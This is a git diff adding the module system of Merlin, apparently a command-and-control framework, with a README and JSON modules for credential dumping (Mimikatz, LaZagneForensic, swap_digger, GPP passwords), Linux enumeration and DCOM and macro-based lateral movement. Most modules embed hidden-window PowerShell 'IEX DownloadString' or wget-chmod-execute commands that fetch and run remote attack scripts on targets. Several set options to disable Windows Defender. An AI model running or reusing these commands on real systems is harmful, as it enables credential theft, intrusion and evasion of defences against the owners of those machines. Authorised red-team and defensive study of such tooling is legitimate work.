+    verboseMessage("note", "User GUID: " + navigator.appVersion);
+}
+
+var run = setInterval(main, waitTime);
\ No newline at end of file
diff --git a/data/modules/README.MD b/data/modules/README.MD
new file mode 100644
index 00000000..9a693388
--- /dev/null
+++ b/data/modules/README.MD
@@ -0,0 +1,102 @@
+# Merlin Module
+Modules are used to perform a set of pre-defined actions or execute a
+program on an agent. The modules are described using JavaScript Object
+Notation (JSON). Modules will be stored in `platform/arch/language/type`
+ directories. Every module _must_ have the `base` object and _may_ have
+ additional objects. Examples of the module structures can be found in
+ the `data/modules/templates` directory. All keys used when describing a
+ module will be lowercase (i.e. name and NOT Name).
+
+## Base
+The `base` module is required and is the lowest level of describing a
+module and its function.
+
+
+ Name   | Type  | Description | Example
+ ---    | ---   | ---   | ---
+ name   | string | The name of the module | "name": "MyModuleName"
+ author | array of strings  | A list of the module's authors | "author": ["Russel Van Tuyl (@Ne0ndog)", "Victor Garcia"]
+ path   | array of strings | The file path to the module| "path": ["C", "windows", "system32"]
+ platform   | string | The target platform the module can run on | "platform": "linux"
+ arch   | string | The target architecture the module can run on | "arch": "x64"
+ lang   | string | The target language the module leverages | "lang": "powershell" or "lang": "bash"
+ privilege | bool | Does the module require elevated privileges? | "privilege": true
+ notes | string | Miscelaneous notes about the module | "notes": "This module doesn't work well on Ubuntu 14.04"
+ remote | string | The remote path where the script associated with the module can be found | "remote": "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"
+ local | array of strings | The local file system path where the script associated with the module can be found | "local": ["data", "src", "PowerSploit", "Exfiltration", "Invoke-Mimikatz.ps1"]
+ options | array of objects | The configurable options for the module | "options": [{"name": "DumpCreds", "value": "true", "required": false, "description":"[Switch]Use mimikatz to dump credentials out of LSASS."}]
+ description | string | A description of the module and its function | "description": "his script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory."
+ commands | array of strings | A list of the commands to be executed on the host when running the script | "commands": ["powershell.exe", "-nop", "-w", "0", "\"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');","Invoke-Mimikatz", "{{DumpCreds.Flag}}", "{{DumpCerts.Flag}}", "{{Command}}", "{{ComputerName}}","\""]
+
+
+### Remote vs Local
+When the module leverages a script, it can be accessed with _either_ the
+ `local` or `remote` values of the base module. The `local` specifies
+ the file path on the server where the script can be found. Merlin _DOES
+ NOT_ ship with scripts. However, they should be copied to the
+ `data/source` directory using something like Git. For example, you move
+ into the `data/source` direct and do a
+ `git clone https://github.com/PowerShellMafia/PowerSploit.git`. When
+the `local` source is used, the script is uploaded to the target from
+the server. When the `remote` source is used, the script is downloaded
+from that location to the target.
+
+### Options
+The `options` uses a special data type that requires 4 parts.
+
+ Name   | Type  | Description | Example
+ ---    | ---   | ---   | ---
+ name | string | The name of the option | "name": "ComputerName"
+ value | string | The configured value for the option | "value": "127.0.0.1"
+ required | bool | Is this option required? | "required": false
+ flag   | string | The command line flag for the option | "flag": "-ComputerName"
+ description | string | A short description of the option | "description": "The target computer name to run the script on"
+
+`name` is the name of the option displayed to the user and is used as a
+variable in the `commands` section of the module file.
+
+Sometimes a command line flag starts with a single dash and other times
+it starts with a double dash (i.e. -h or --help). Other times the
+command line flag is not descriptive enough to present to the user.
+For example `-x` would not be a good name to display to the user when
+configuring a module. For these reasons, the `flag` value is separate
+from the `name` value. The `name` value can be used to alias the `flag`
+value.
+
+### Commands
+The `commands` section of the module is used to provide the commands
+that are going to be executed on the host. The array should consist of
+every command in its own list item. You do not need to account for
+spaces. This is automatically done when the command is executed on the
+host.
+
+You specify the location of an `option` by using double curly brace and
+the option's `name` value. For example if want to create a module to use
+the PowerShell Get-Process cmdlet with an option to specify the process
+name, the command section would like
+`["Get-Process", "{{processName}}"]`. When the module is executed, the
+`{{processName}}` variable is replace with the option's `flag` value
+and `value` data. The option is removed from the command if the `value`
+is empty. This should the most common and practical notation.
+
+When the `flag` is just a switch, as in it has no value, set the option
+in the command section using {{processName.Flag}}. When the module is
+executed, only the flag value will be provided and not the `value` data.
+ It is important to note that the `value` must be `true` for the flag to
+ be set. All other values will result in the flag being not set.
+
+When the command take a positional character with no flag, use
+`{{processName.Value}}`. When the module is executed, it will be replace
+ with the option's `value` data or removed if `value` is empty.
+
+## Powershell
+The `powershell` module is used to provide additional configuration
+options that pertain to PowerShell commands. Support for this module
+type is currently lacking. At this time is being used as placeholder
+for future development.
+
+ Name   | Type  | Description | Example
+ ---    | ---   | ---   | ---
+ disableav | bool | Should Windows Defender be disabled prior to running the command? | "disableav" : true
+ obfuscate | bool | Should the PowerShell command be obfuscated? | "obfuscate": false
+ base64     | bool | Should the command be Base64 encoded? | "base64": true
\ No newline at end of file
diff --git a/data/modules/linux/x64/bash/credentials/SwapDigger.json b/data/modules/linux/x64/bash/credentials/SwapDigger.json
new file mode 100644
index 00000000..0980c7b7
--- /dev/null
+++ b/data/modules/linux/x64/bash/credentials/SwapDigger.json
@@ -0,0 +1,44 @@
+{
+  "base": {
+    "name": "Swap Digger",
+    "author": ["Emeric “Sio” Nasi (@EmericNasi)"],
+    "path": ["linux", "x64", "bash", "credentials", "SwapDigger.json"],
+    "platform": "linux",
+    "arch": "x64",
+    "lang": "bash",
+    "privilege": true,
+    "notes": "http://blog.sevagas.com/?Digging-passwords-in-Linux-swap",
+    "remote": "https://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.sh",
+    "local": ["data", "src", "sevagas", "swap_digger", "swap_digger.sh"],
+    "options": [
+      {"name": "extended", "value": "", "required": false, "flag": "--extended", "description":"[switch]Run Extended tests on the target swap to retrieve other interesting data (web passwords, emails, wifi creds, most accessed urls, etc)"},
+      {"name": "guessing", "value": "", "required": false, "flag": "--guessing", "description":"[switch]Try to guess potential passwords based on observations and stats. Warning: This option is not reliable, it may dig more passwords as well as hundreds false positives."},
+      {"name": "help", "value": "", "required": false, "flag": "-h", "description":"[switch]Display the help."},
+      {"name": "verbose", "value": "", "required": false, "flag": "-v", "description":"[switch]Verbose mode."},
+      {"name": "log", "value": "", "required": false, "flag": "--log", "description":"Log all outputs in a log file (protected inside the generated working directory)."},
+      {"name": "clean", "value": "", "required": false, "flag": "--clean", "description":"Automatically erase the generated working directory at end of script (will also remove log file)"},
+      {"name": "rootPath", "value": "", "required": false, "flag": "--root-path", "description":"Location of the target file-system root (default value is /). Change this value for forensic analysis when target is a mounted file system. This option has to  be used along the -s option to indicate path to swap device."},
+      {"name": "swapPath", "value": "", "required": false, "flag": "--swap-path", "description":"Location of swap device or swap dump to analyse. Use this option for forensic/remote analysis of a swap dump or a mounted external swap partition. This option should be used with the -r option where at least /<root-path>/etc/shadow exists."},
+      {"name": "swapSearch", "value": "", "required": false, "flag": "--swap-search", "description":"[switch]Search for all available swap devices (use for forensics)."}
+    ],
+    "description": "swap_digger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purpose. It automates swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, HTTP basic authentication, WiFi SSID and keys, etc.",
+    "commands": [
+      "wget", "-O",
+      "/tmp/swap_digger.sh https://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.sh;",
+      "chmod",
+      "+x",
+      "/tmp/swap_digger.sh;",
+      "/tmp/swap_digger.sh -vxc;",
+      "{{extended.Flag}}",
+      "{{guessing.Flag}}",
+      "{{help.Flag}}",
+      "{{verbose.Flag}}",
+      "{{log.Flag}}",
+      "{{clean.Flag}}",
+      "{{rootPath}}",
+      "{{swapPath}}",
+      "{{swapSearch.Flag}}",
+      "rm /tmp/update.sh"
+    ]
+  }
+}
\ No newline at end of file
diff --git a/data/modules/linux/x64/bash/privesc/LinEnum.json b/data/modules/linux/x64/bash/privesc/LinEnum.json
new file mode 100644
index 00000000..478e8c0e
--- /dev/null
+++ b/data/modules/linux/x64/bash/privesc/LinEnum.json
@@ -0,0 +1,36 @@
+{
+  "base": {
+    "name": "LinEnum",
+    "author": ["Owen (@rebootuser)"],
+    "path": ["linux", "x64", "bash", "privesc", "LinEnum.json"],
+    "platform": "linux",
+    "arch": "x64",
+    "lang": "bash",
+    "privilege": false,
+    "notes": "",
+    "remote": "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh",
+    "local": ["data", "src", "rebootuser", "LinEnum", "LinEnum.sh"],
+    "options": [
+      {"name": "keyword", "value": "", "required": false, "flag": "-k", "description":"Enter keyword"},
+      {"name": "export", "value": "", "required": false, "flag": "-e", "description":"Enter export location"},
+      {"name": "thorough", "value": "", "required": false, "flag": "-t", "description":"Include thorough (lengthy) tests"},
+      {"name": "report", "value": "", "required": false, "flag": "-r", "description":"Enter report name"},
+      {"name": "help", "value": "", "required": false, "flag": "-h", "description":"Displays the help text"}
+    ],
+    "description": "A script to enumerate local information from a Linux host",
+    "commands": [
+      "wget", "-O /tmp/update.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh;",
+      "chmod",
+      "+x",
+      "/tmp/update.sh;",
+      "/tmp/update.sh",
+      "{{keyword}}",
+      "{{export}}",
+      "{{thorough.Flag}}",
+      "{{report}}",
+      "{{help.Flag}}",
+      ";",
+      "rm /tmp/update.sh"
+    ]
+  }
+}
\ No newline at end of file
diff --git a/data/modules/templates/base.json b/data/modules/templates/base.json
new file mode 100644
index 00000000..e78f74fa
--- /dev/null
+++ b/data/modules/templates/base.json
@@ -0,0 +1,23 @@
+{
+  "base": {
+    "name": "",
+    "author": [""],
+    "path": [""],
+    "platform": "",
+    "arch": "",
+    "lang": "",
+    "privilege": false,
+    "notes": "",
+    "remote": "",
+    "local": [""],
+    "options": [
+      {"name": "", "value": "", "required": true, "flag": "", "description":""},
+      {"name": "", "value": "", "required": false, "flag": "", "description":""}
+    ],
+    "description": "",
+    "commands": [
+      "",
+      ""
+    ]
+  }
+}
\ No newline at end of file
diff --git a/data/modules/templates/powershell.json b/data/modules/templates/powershell.json
new file mode 100644
index 00000000..5d548afa
--- /dev/null
+++ b/data/modules/templates/powershell.json
@@ -0,0 +1,7 @@
+{
+  "powershell": {
+    "disableav": true,
+    "obfuscate": false,
+    "base64": false
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/credentials/LaZagneForensic.json b/data/modules/windows/x64/powershell/credentials/LaZagneForensic.json
new file mode 100644
index 00000000..b6dcc0b7
--- /dev/null
+++ b/data/modules/windows/x64/powershell/credentials/LaZagneForensic.json
@@ -0,0 +1,33 @@
+{
+  "base": {
+    "type": "standard",
+    "name": "LaZagneForensic",
+    "author": ["AlessandroZ"],
+    "path": ["windows", "x64", "powershell", "credentials", "LaZagneForensic"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "PowerShell",
+    "privilege": true,
+    "notes": "Note: The main problem is that to decrypt these passwords, the user Windows passwords is needed. This script creates the files on the target and you must retrieve them",
+    "remote": "https://raw.githubusercontent.com/AlessandroZ/LaZagneForensic/master/dump/dump.ps1",
+    "local": ["data", "src", "LaZagneForensic", "dump", "dump.ps1"],
+    "options": [
+      {"name": "Out", "value": "C:\\temp", "required": true, "flag":"-Out", "description":"Specify the name of the directory where all files will be copied (default: dump)"}
+    ],
+    "description": "LaZagne uses an internal Windows API called CryptUnprotectData to decrypt user passwords. This API should be called on the victim user session, otherwise, it does not work. If the computer has not been started (when the analysis is realized on an offline mounted disk), or if we do not want to drop a binary on the remote host, no passwords can be retrieved. LaZagneForensic has been created to avoid this problem. This work has been mainly inspired by the awesome work done by Jean-Michel Picod for DPAPICK and Francesco Picasso for Windows DPAPI laboratory.",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w 0",
+      "\"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/AlessandroZ/LaZagneForensic/master/dump/dump.ps1');",
+      "Dump",
+      "{{out}}",
+      "\""
+    ]
+  },
+  "powershell": {
+    "disableav": false,
+    "obfuscate": false,
+    "base64": false
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/credentials/dumpCredStore.json b/data/modules/windows/x64/powershell/credentials/dumpCredStore.json
new file mode 100644
index 00000000..3b0ad388
--- /dev/null
+++ b/data/modules/windows/x64/powershell/credentials/dumpCredStore.json
@@ -0,0 +1,28 @@
+{
+  "base": {
+    "type": "standard",
+    "name": "dumpCredStore",
+    "author": ["JimmyJoeBob Alooba", "BeetleChunks"],
+    "path": ["windows", "x64", "powershell", "credentials", "dumpCredStore"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "PowerShell",
+    "privilege": false,
+    "notes": "This modules is a modified and stripped down version of CredMan.ps1, written by JimmyJoeBob Alooba.",
+    "remote": "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/dumpCredStore.ps1",
+    "local": ["data", "src", "Empire", "data", "module_source","credentials","dumpCredStore.ps1"],
+    "options": [],
+    "description": "PowerShell script that provides access to the Win32 Credential Manager API used for management of stored credentials.",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w 0",
+      "\"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/dumpCredStore.ps1')\""
+    ]
+  },
+  "powershell": {
+    "disableav": false,
+    "obfuscate": false,
+    "base64": false
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/detection/Get-InjectedThread.json b/data/modules/windows/x64/powershell/detection/Get-InjectedThread.json
new file mode 100644
index 00000000..66c4ff0a
--- /dev/null
+++ b/data/modules/windows/x64/powershell/detection/Get-InjectedThread.json
@@ -0,0 +1,30 @@
+{
+  "base": {
+    "type": "standard",
+    "name": "Get-InjectedThread",
+    "author": ["Jared Atkinson (@jaredcatkinson)"],
+    "path": ["windows", "x64", "powershell", "detection", "Get-InectedThread"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "PowerShell",
+    "privilege": true,
+    "notes": "Looks for threads that were created as a result of code injection.",
+    "remote": "https://gist.githubusercontent.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2/raw/c5e20d54c35d0ef6736793d2504d29b8610e9727/Get-InjectedThread.ps1",
+    "local": ["data", "src", "jaredcatkinson", "gists", "Get-InectedThread.ps1"],
+    "options": [],
+    "description": "Memory resident malware (fileless malware) often uses a form of memory injection to get code execution. Get-InjectedThread looks at each running thread to determine if it is the result of memory injection.\\r\\nCommon memory injection techniques that *can* be caught using this method include:\\r\\n\\t- Classic Injection (OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread)\\r\\n\\t- Reflective DLL Injection\\r\\n\\t- Memory Module\\r\\n\\r\\nNOTE: Nothing in security is a silver bullet. An attacker could modify their tactics to avoid detection using this methodology.",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w 0",
+      "\"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2/raw/c5e20d54c35d0ef6736793d2504d29b8610e9727/Get-InjectedThread.ps1');",
+      "Get-InjectedThread.ps1",
+      "\""
+    ]
+  },
+  "powershell": {
+    "disableav": false,
+    "obfuscate": false,
+    "base64": false
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/lateral/dcom/Invoke-DCOM.json b/data/modules/windows/x64/powershell/lateral/dcom/Invoke-DCOM.json
new file mode 100644
index 00000000..5ca4a748
--- /dev/null
+++ b/data/modules/windows/x64/powershell/lateral/dcom/Invoke-DCOM.json
@@ -0,0 +1,42 @@
+{
+  "base": {
+    "type": "standard",
+    "name": "Invoke-DCOM",
+    "author": ["Steve Borosh (@rvrsh3ll)"],
+    "path": ["windows", "x64", "powershell", "lateral", "dcom", "Invoke-DCOM.json"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "PowerShell",
+    "privilege": false,
+    "notes": "Execute's commands via various DCOM methods as demonstrated by (@enigma0x3) http://www.enigma0x3.net.\r\nExample: Invoke-DCOM -ComputerName '192.168.2.100' -Method MMC20.Application -Command \"calc.exe\"",
+    "remote": "https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1",
+    "local": ["data", "src", "rvrsh3ll", "Misc-Powershell-Scripts", "Invoke-DCOM.ps1"],
+    "options": [
+      {"name": "ComputerName", "value": "127.0.0.1", "required": true, "flag": "-ComputerName", "description":"IP Address or Hostname of the remote system"},
+      {"name": "Method", "value": "MMC20.Application", "required": true, "flag": "-Method", "description":"Specifies the desired type of execution. Options are MMC20.Application, ExcelDDE, ServiceStart, ShellWindows, ShellBrowserWindow, CheckDomain, MinimizeAll, ServiceStop, ServiceStart, DetectOffice, RegisterXLL"},
+      {"name": "Command", "value": "calc.exe", "required": true, "flag": "-Command", "description":"Specifies the desired command to be executed"},
+      {"name": "ServiceName", "value": null, "required": false, "flag": "-ServiceName", "description":""},
+      {"name": "DLLPath", "value": null, "required": false, "flag": "-DLLPath", "description":""}
+    ],
+    "description": "Invoke commands on remote hosts via MMC20.Application COM object over DCOM.",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w", "0",
+      "\"IEX",
+      "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1');",
+      "Invoke-DCOM",
+      "{{ComputerName}}",
+      "{{Method}}",
+      "{{Command}}",
+      "{{DLLPath}}",
+      "{{ServiceName}}",
+      "\""
+    ]
+  },
+  "powershell": {
+    "disableav": true,
+    "obfuscate": false,
+    "base64": false
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/lateral/dcom/Invoke-DCOMPowerPointPivot.json b/data/modules/windows/x64/powershell/lateral/dcom/Invoke-DCOMPowerPointPivot.json
new file mode 100644
index 00000000..4e1ea294
--- /dev/null
+++ b/data/modules/windows/x64/powershell/lateral/dcom/Invoke-DCOMPowerPointPivot.json
@@ -0,0 +1,39 @@
+{
+  "base": {
+    "type": "standard",
+    "name": "Invoke-DCOMPowerPointPivot",
+    "author": ["(@_nephalem_)"],
+    "path": ["windows", "x64", "powershell", "lateral", "dcom", "Invoke-DCOMPowerPointPivot"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "PowerShell",
+    "privilege": true,
+    "notes": "",
+    "remote": "https://raw.githubusercontent.com/attactics/Invoke-DCOMPowerPointPivot/master/Invoke-DCOMPowerPointPivot.ps1",
+    "local": ["data", "src", "attactics", "gists", "Invoke-DCOMPowerPointPivot", "Invoke-ExcelMacroPivot.ps1"],
+    "options": [
+      {"name": "Target", "value": "'127.0.0.1'", "required": true, "flag": "-Target", "description":"Target host"},
+      {"name": "AddinPath", "value": "'c:\\PowerPoint.ppa'", "required": true, "flag": "-AddinPath", "description":"Local filepath for .ppa / .ppam file"},
+      {"name": "DestPath", "value": "'c:\\Windows\\Temp\\NiceFile.ppam'", "required": false, "flag": "-DestPath", "description":"Specifies a custom destination file path on the target device. Default: Place file with same name as source file in C:\\"},
+      {"name": "ExecWaitTime", "value": "10", "required": false, "flag": "-ExecWaitTime", "description":"Specifies a custom wait time for the Add-In to execute before unloading. Default: 5 seconds"}
+    ],
+    "description": "Facilitates pivoting to a target through PowerPoint Add-In Macro and the PowerPoint COM object cmdlet adapted from Invoke-ExcelMacroPivot by @enimga0x3",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w 0",
+      "\"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/attactics/Invoke-DCOMPowerPointPivot/master/Invoke-DCOMPowerPointPivot.ps1');",
+      "Invoke-DCOMPowerPointPivot",
+      "{{Target}}",
+      "{{AddinPath}}",
+      "{{DestPath}}",
+      "{{ExecWaitTime}}",
+      "\""
+    ]
+  },
+  "powershell": {
+    "disableav": false,
+    "obfuscate": false,
+    "base64": false
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/lateral/dcom/Invoke-ExcelMacroPivot.json b/data/modules/windows/x64/powershell/lateral/dcom/Invoke-ExcelMacroPivot.json
new file mode 100644
index 00000000..3cda240a
--- /dev/null
+++ b/data/modules/windows/x64/powershell/lateral/dcom/Invoke-ExcelMacroPivot.json
@@ -0,0 +1,37 @@
+{
+  "base": {
+    "type": "standard",
+    "name": "Invoke-ExcelMacroPivot",
+    "author": ["Matt Nelson (@enigma0x3)"],
+    "path": ["windows", "x64", "powershell", "lateral", "dcom", "Invoke-ExcelMacroPivot"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "PowerShell",
+    "privilege": true,
+    "notes": "Pivots to a remote host by using an Excel macro and Excel's COM object",
+    "remote": "https://gist.githubusercontent.com/enigma0x3/8d0cabdb8d49084cdcf03ad89454798b/raw/e45321569202367e6fea440ddd84d155781553cf/Invoke-ExcelMacroPivot.ps1",
+    "local": ["data", "src", "enigma0x3", "gists", "Invoke-ExcelMacroPivot.ps1"],
+    "options": [
+      {"name": "Target", "value": "127.0.0.1", "required": true, "flag":"-Target", "description":"Remote host to pivot to"},
+      {"name": "RemoteDocumentPath", "value": "C:\\Book1.xlsm", "required": true, "flag":"-RemoteDocumentPath", "description":"Local path on the remote host where the payload resides"},
+      {"name": "MacroName", "value": "Auto_Open", "required": true, "flag":"-MacroName", "description":"The name of the macro residing in the payload document"}
+    ],
+    "description": "Pivots to a remote host by using an Excel macro and Excel's COM object",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w 0",
+      "\"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/enigma0x3/8d0cabdb8d49084cdcf03ad89454798b/raw/e45321569202367e6fea440ddd84d155781553cf/Invoke-ExcelMacroPivot.ps1');",
+      "Invoke-ExcelMacroPivot",
+      "{{Target}}",
+      "{{RemoteDocumentPath}}",
+      "{{MacroName}}",
+      "\""
+    ]
+  },
+  "powershell": {
+    "disableav": false,
+    "obfuscate": false,
+    "base64": false
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/lateral/gpo/Find-ComputersWithRemoteAccessPolicies.json b/data/modules/windows/x64/powershell/lateral/gpo/Find-ComputersWithRemoteAccessPolicies.json
new file mode 100644
index 00000000..884eee8c
--- /dev/null
+++ b/data/modules/windows/x64/powershell/lateral/gpo/Find-ComputersWithRemoteAccessPolicies.json
@@ -0,0 +1,39 @@
+{
+  "base": {
+    "name": "Find-ComputersWithRemoteAccessPolicies",
+    "author": ["William Knowles (@william_knows)","Jon Cave (@joncave)"],
+    "path": ["windows", "x64", "powershell", "lateral", "gpo","Find-ComputersWithRemoteAccessPolicies.json"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "powershell",
+    "privilege": false,
+    "notes": "PowerView extensions for enumerating remote access policies through group policy. Blog Post: https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/",
+    "remote": "https://raw.githubusercontent.com/mwrlabs/gists/master/PowerView-with-RemoteAccessPolicyEnumeration.ps1",
+    "local": ["data", "src", "mwrlabs", "gists", "Find-ComputersWithRemoteAccessPolicies.ps1"],
+    "options": [
+      {"name": "Domain", "value": "", "required": true, "flag":"-Domain", "description":"Specifies the domain to use for the query, defaults to the current domain."},
+      {"name": "SearchBase", "value": "", "required": false, "flag":"-SearchBase", "description":"The LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\". Useful for OU queries."},
+      {"name": "SearchScope", "value": "", "required": false, "flag":"-SearchScope", "description":"Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree)."},
+      {"name": "Server", "value": "", "required": false, "flag":"-Server", "description":"Specifies an Active Directory server (domain controller) to bind to."},
+      {"name": "ResultPageSize", "value": "", "required": false, "flag":"-ResultPageSize", "description":"Specifies the PageSize to set for the LDAP searcher object."},
+      {"name": "ServerTimeLimit", "value": "", "required": false, "flag":"-ServerTimeLimit", "description":"Specifies the maximum amount of time the server spends searching. Default of 120 seconds."},
+      {"name": "Credential", "value": "", "required": false, "flag":"-Credential", "description":"A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain."}
+    ],
+    "description": "",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w 0",
+      "\"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mwrlabs/gists/master/PowerView-with-RemoteAccessPolicyEnumeration.ps1');",
+      "Find-ComputersWithRemoteAccessPolicies",
+      "{{Domain}}",
+      "{{SearchBase}}",
+      "{{SearchScope}}",
+      "{{Server}}",
+      "{{ResultPageSize}}",
+      "{{ServerTimeLimit}}",
+      "{{Credential}}",
+      "\""
+    ]
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/lateral/gpo/Grouper.json b/data/modules/windows/x64/powershell/lateral/gpo/Grouper.json
new file mode 100644
index 00000000..1e3808a6
--- /dev/null
+++ b/data/modules/windows/x64/powershell/lateral/gpo/Grouper.json
@@ -0,0 +1,40 @@
+{
+  "base": {
+    "type": "standard",
+    "name": "Grouper",
+    "author": ["Mike Loss (@l0ss)"],
+    "path": ["windows", "x64", "powershell", "lateral", "gpo", "grouper.json"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "PowerShell",
+    "privilege": false,
+    "notes": "Grouper is a slightly wobbly PowerShell module designed for pentesters and redteamers (although probably also useful for sysadmins) which sifts through the (usually very noisy) XML output from the Get-GPOReport cmdlet (part of Microsoft's Group Policy module) and identifies all the settings defined in Group Policy Objects (GPOs) that might prove useful to someone trying to do something fun/evil.",
+    "remote": "https://raw.githubusercontent.com/l0ss/Grouper/master/grouper.psm1",
+    "local": ["data", "src", "l0ss", "Grouper", "grouper.psm1"],
+    "options": [
+      {"name": "ComputerName", "value": "", "required": false, "flag": "-ComputerName", "description":""},
+      {"name": "Path", "value": "C:\\temp\\gporeport.xml", "required": true, "flag": "-Path", "description":"The file path for where to save the GPO Report"},
+      {"name": "showDisabled", "value": "", "required": false, "flag": "-showDisabled","description":"By default we just filter out policy objects that aren't enabled or linked anywhere."},
+      {"name": "Level", "value": "2", "required": true, "flag": "-Level", "description":"adjusts whether to show everything (1) or only interesting (2) or only definitely vulnerable (3) settings. Defaults to 2."}
+    ],
+    "description": "A PowerShell script for helping to find vulnerable settings in AD Group Policy.",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w 0",
+      "Get-GPOReport -All -ReportType xml {{Path.Flag}} {{Path.Value}};",
+      "\"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/l0ss/Grouper/master/grouper.psm1');",
+      "Invoke-AuditGPOReport",
+      "{{Path}}",
+      "{{Level}}",
+      "{{ComputerName}}",
+      "{{showDisabled}}",
+      "\""
+    ]
+  },
+  "powershell": {
+    "disableav": true,
+    "obfuscate": false,
+    "base64": false
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/powersploit/Get-GPPPassword.json b/data/modules/windows/x64/powershell/powersploit/Get-GPPPassword.json
new file mode 100644
index 00000000..f4313865
--- /dev/null
+++ b/data/modules/windows/x64/powershell/powersploit/Get-GPPPassword.json
@@ -0,0 +1,27 @@
+{
+  "base": {
+    "name": "Get-GPPPassword",
+    "author": ["Chris Campbell (@obscuresec)"],
+    "path": ["windows", "x64", "powershell", "powersploit", "Get-GPPPassword.json"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "PowerShell",
+    "notes": "This is part of the PowerSploit project https://github.com/PowerShellMafia/PowerSploit",
+    "remote": "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1",
+    "local": ["data", "src", "PowerSploit", "Exfiltration", "Get-GPPPassword.ps1"],
+    "options": [
+      {"name": "Source", "value": "remote", "required": true, "flag": null, "description":"Use local or remote code repository"},
+      {"name": "Server", "value": null, "required": false, "flag": "-Server", "description":"Set the target server"}
+    ],
+    "description": "Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w 0",
+      "\"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1');",
+      "Get-GPPPassword",
+      "{{Server}}",
+      "\""
+    ]
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/powersploit/Invoke-Mimikatz.json b/data/modules/windows/x64/powershell/powersploit/Invoke-Mimikatz.json
new file mode 100644
index 00000000..97cd5933
--- /dev/null
+++ b/data/modules/windows/x64/powershell/powersploit/Invoke-Mimikatz.json
@@ -0,0 +1,41 @@
+{
+  "base": {
+    "name": "Invoke-Mimikatz",
+    "author": [
+      "Joe Bialek (@JosephBialek)",
+      "Benjamin Delpy (@gentilkiwi)"
+    ],
+    "path": ["windows", "x64", "powershell", "powersploit", "Invoke-Mimikatz.json"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "PowerShell",
+    "privilege": true,
+    "notes": "This is part of the PowerSploit project https://github.com/PowerShellMafia/PowerSploit",
+    "remote": "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1",
+    "local": ["data", "src", "PowerSploit", "Exfiltration", "Invoke-Mimikatz.ps1"],
+    "options": [
+      {"name": "DumpCreds", "value": "true", "required": false, "flag": "-DumpCreds", "description":"[Switch]Use mimikatz to dump credentials out of LSASS."},
+      {"name": "DumpCerts", "value": null, "required": false, "flag": "-DumpCerts", "description":"[Switch]Use mimikatz to export all private certificates (even if they are marked non-exportable)."},
+      {"name": "Command", "value": null, "required": false, "flag": "-Command", "description":"Supply mimikatz a custom command line. This works exactly the same as running the mimikatz executable like this: mimikatz \"privilege::debug exit\" as an example."},
